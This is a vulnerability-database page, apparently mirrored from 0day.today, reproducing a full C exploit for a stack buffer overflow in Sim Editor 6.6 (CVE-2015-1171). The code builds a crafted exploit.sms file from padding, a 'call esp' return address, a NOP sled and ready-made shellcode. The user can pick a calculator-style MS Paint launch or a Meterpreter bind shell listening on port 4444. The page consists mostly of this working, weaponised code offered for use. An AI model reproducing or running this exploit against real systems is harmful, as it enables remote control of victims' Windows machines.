Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sim Editor 6.6 Buffer Overflow Exploit

🗓️ 17 Jan 2015 00:00:00Reported by Osanda MalithType 
zdt
 zdt🔗 0day.today👁 33 Views

Sim Editor v6.6 Buffer Overflow Exploit on Windows

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2015-1171
29 May 201815:50
circl
CNVD		GSM SIM Utility Stack Buffer Overflow Vulnerability
1 Sep 201500:00
cnvd
CVE		CVE-2015-1171
28 Aug 201520:57
cve
Cvelist		CVE-2015-1171
28 Aug 201520:57
cvelist
Exploit DB		Sim Editor 6.6 - Local Stack Buffer Overflow
16 Jan 201500:00
exploitdb
exploitpack		Sim Editor 6.6 - Local Stack Buffer Overflow
16 Jan 201500:00
exploitpack
Metasploit		GSM SIM Editor 5.15 Buffer Overflow
14 Apr 201205:12
metasploit
NVD		CVE-2015-1171
28 Aug 201521:59
nvd
Packet Storm		Sim Editor 6.6 Buffer Overflow
16 Jan 201500:00
packetstorm
Prion		Stack overflow
28 Aug 201521:59
prion
Rows per page
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 65536  

/*
 * Title: Sim Editor v6.6 Stack Based Buffer Overflow
 * Version: 6.6
 * Tested on: Windows XP sp2 en, Windows 8 64-bit
 * Date: 16-01-2015
 * Author: Osanda Malith Jayathissa
 * Website: OsandaMalith.wordpress.com
 */


void add(int count, unsigned char* dest, unsigned char *src);
int menu();
void banner();

int main()
{
    banner();
    int i = menu();
    unsigned char *buff, *nops;
    FILE *outfile;    
   
    buff = (unsigned char*) malloc (SIZE);
    nops = (unsigned char*) malloc (SIZE);
    if (!buff) exit (1);

    buff[0] = nops[0] = 0; 
    add(405, buff, "41");
    add(16, nops, "90");

    unsigned char ret[] = "D3804200"; /* 0x4280D3  call esp */
            
    outfile = fopen("exploit.sms", "w");

    if (!outfile) printf("%s\n","Could not open file");   
    
    fputs(buff,   outfile);
    fputs(ret,    outfile);
    fputs(nops,   outfile);
    
    if(i == 1) {
  unsigned char shell[] = "ba516a43ddd9e9d97424f45e33c9b1"
        "3231561503561583eefce2a496ab54"
        "46672c07cf821d15abc70ca9b88abc"
        "42ec3e36263830ff8d1e7f00209ed3"
        "c222622e17855be16ac49c1c849475"
        "6a3709f22e8428d424b45251fa41e9"
        "582bf96612d3712082e25632feadd3"
        "81752c32d8761e7ab749ae77c98e09"
        "68bce46915c73f13c142ddb382f505"
        "454663ce4923e7884db224a36a3fcb"
        "63fb7be8a7a7d891fe0d8eaee0ea6f"
        "0b6b187b2d36777abf4d3e7cbf4d11"
        "158ec6fe620f0dbb9d450fea3500da"
        "ae5bb331ec6530b38d9128b688deee"
        "2be14f9b4b566f8e262bff50d1a58b"
        "92"; fputs(shell,  outfile);}

  else if(i == 2) {
  /* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
  unsigned char shell[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
        "4a83effc315f11035f11e2ca04054e"
        "34f5d62fbd10e77dd9515ab2aa3457"
        "39feacec4fd6c345e500ed56cb8ca1"
        "954d70b8c9ad49731caf8e6eeffd47"
        "e44212ecb85e99be2ce77e744cc6d0"
        "0317c8d3c02341cc050f1b67fdfb9a"
        "a1cc04ad8d823a0100db7ba6fbae77"
        "d486a843a65c3d560016e5b2b0fb73"
        "30beb0f01ea347d514dfccd8fa6996"
        "fede324c9f479f23a098479b04d26a"
        "c831b9e23d7342f3290431c1f6bedd"
        "697e18198d55dcb570561c9fb6024c"
        "b71f2b07479ffe87170f5167c8ef01"
        "0f02e07e2f2d2a179e098670e2ad38"
        "dd6b4b50cd3dc3cd2f1adc6a4f4970"
        "22c7c69ef4e8d7b45644705f2d8645"
        "7e3283ee17a5597e55575dab0f97cb"
        "5786c06355ff272ca62a3ce532952b"
        "0ad215ac5cb815c4389845f14635fa"
        "aad2b5ab1f74dd5179b242a9ac42bf"
        "7c89c0c90af908";
        fputs(shell,  outfile); 
        puts("[*] Connect on port 4444");}
  else { puts("[-] Enter a valid input"); exit(-1); }    

    fclose(outfile);
    free(buff);
    printf("%s","[+] Successfully to written to \"exploit.sms\""); 
    
    return 0;
}

void add(int count, unsigned char* dest, unsigned char *src) {
    int i;
    for (i=0; i<count; i++) strcat(dest, src); 
}

int menu() {
  int i;
  puts("\b[?] Choose an Option: ");
  puts("1. MS Paint");
  puts("2. Bind Shell");
  scanf("%i", &i);
  return i;
}

void 
banner() {
    static const char banner[] =                                                                                                
                " _____ _          _____   _ _ _           \n"
                "|   __|_|_____   |   __|_| |_| |_ ___ ___ \n"
                "|__   | |     |  |   __| . | |  _| . |  _|\n"
                "|_____|_|_|_|_|  |_____|___|_|_| |___|_|\n"
                "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
                "[~] Author: Osanda Malith Jayathissa\n"
                "[~] Website: OsandaMalith.wordpress.com\n\n";  
                                           
    fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}

#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jan 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.76868
buffer overflowwindows xpwindows 8stack basedosanda malith jayathissasim editor v6.6exploitms paintbind shellstackbufferoverflowwindowsauthorwebsite
33